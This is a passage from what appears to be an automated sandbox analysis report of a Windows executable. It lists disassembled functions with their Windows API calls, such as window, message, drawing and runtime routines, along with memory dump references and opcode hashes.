                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String
                                      • String ID:
                                      • API String ID: 2832842796-0
                                      • Opcode ID: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                      • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                      • Opcode Fuzzy Hash: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                      • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                      Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00436A24
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: RectWindow
                                      • String ID:
                                      • API String ID: 861336768-0
                                      • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                      • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                      • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                      • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                      Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32 ref: 00449598
                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                      • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                      • _wcslen.LIBCMT ref: 0044960D
                                      • _wcslen.LIBCMT ref: 0044961A
                                      • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$_wcslen$_wcspbrk
                                      • String ID:
                                      • API String ID: 1856069659-0
                                      • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                      • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                      • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                      • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                      Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004478E2
                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                      • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                      • GetCursorPos.USER32(00000000), ref: 0044796A
                                      • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CursorMenuPopupTrack$Proc
                                      • String ID:
                                      • API String ID: 1300944170-0
                                      • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                      • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                      • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                      • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                      Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004479CC
                                      • GetCursorPos.USER32(?), ref: 004479D7
                                      • ScreenToClient.USER32(?,?), ref: 004479F3
                                      • WindowFromPoint.USER32(?,?), ref: 00447A34
                                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Client$CursorFromPointProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 1822080540-0
                                      • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                      • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                      • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                      • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                      Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                        • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                        • Part of subcall function 00440D98: SendMessageW.USER32(00B31B98,000000F1,00000000,00000000), ref: 00440E6E
                                        • Part of subcall function 00440D98: SendMessageW.USER32(00B31B98,000000F1,00000001,00000000), ref: 00440E9A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$EnableMessageSend$LongShow
                                      • String ID:
                                      • API String ID: 142311417-0
                                      • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                      • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                      • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                      • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                      Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                      • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                      • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                      • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                      Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00445879
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                      • _wcslen.LIBCMT ref: 004458FB
                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                      • String ID:
                                      • API String ID: 3087257052-0
                                      • Opcode ID: 361cacf42ac9feaf17efa0cc57a42f9ac02e5fc726f21fc3ca83feaa1aa35840
                                      • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                      • Opcode Fuzzy Hash: 361cacf42ac9feaf17efa0cc57a42f9ac02e5fc726f21fc3ca83feaa1aa35840
                                      • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                      Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 004471D8
                                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                      • SelectObject.GDI32(?,00000000), ref: 00447228
                                      • BeginPath.GDI32(?), ref: 0044723D
                                      • SelectObject.GDI32(?,00000000), ref: 00447266
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Object$Select$BeginCreateDeletePath
                                      • String ID:
                                      • API String ID: 2338827641-0
                                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                      Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 00434598
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                      • Sleep.KERNEL32(00000000), ref: 004345D4
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                      Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                      • String ID:
                                      • API String ID: 4023252218-0
                                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                      Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                      • String ID:
                                      • API String ID: 1489400265-0
                                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                      Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                      • DestroyWindow.USER32(?), ref: 00455728
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                      • String ID:
                                      • API String ID: 1042038666-0
                                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                      Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0041780F
                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                      • __getptd.LIBCMT ref: 00417826
                                      • __amsg_exit.LIBCMT ref: 00417834
                                      • __lock.LIBCMT ref: 00417844
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                      Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                      • ExitThread.KERNEL32 ref: 004151ED
                                      • __freefls@4.LIBCMT ref: 00415209
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
